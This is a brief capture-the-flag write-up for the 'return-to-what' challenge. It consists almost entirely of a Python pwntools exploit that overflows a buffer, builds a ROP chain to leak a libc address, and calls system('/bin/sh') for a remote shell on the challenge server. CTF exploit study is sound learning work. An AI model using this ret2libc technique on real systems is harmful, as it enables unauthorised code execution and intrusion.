Tags: bufferoverflow ret2libc ropchain 

Rating:

Buffer Overflow, Strandard Return2Libc

```
#!/usr/bin/python

from pwn import *

context(os='linux',arch='amd64')
context.log_level = 'DEBUG'

#p = process('./return-to-what')
p = remote('chal.duc.tf', 30003)
e = ELF('./return-to-what')
libc = ELF('./libc.so.6')

JUNK = "A"*56

main = e.symbols['main']
gets = e.plt['gets']
plt_puts = e.plt['puts']
got_puts = e.got['puts']
pop_rdi = e.search(asm('pop rdi; ret')).next()
bss = e.get_section_by_name('.bss')["sh_addr"]+1500

payload = JUNK + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_rdi) + p64(got_puts) + p64(plt_puts) + p64(main)

p.recvuntil("to?\n")
p.sendline(payload)
p.sendline("/bin/sh\x00")

leak = u64(p.recvline().strip().ljust(8,"\x00"))
print hex(leak)

libc_puts = libc.symbols['puts']
libc_system = libc.symbols['system']
lba = leak - libc_puts

payload = JUNK + p64(pop_rdi) + p64(bss) + p64(libc_system + lba)

p.recvuntil("to?\n")
p.sendline(payload)

p.interactive()
```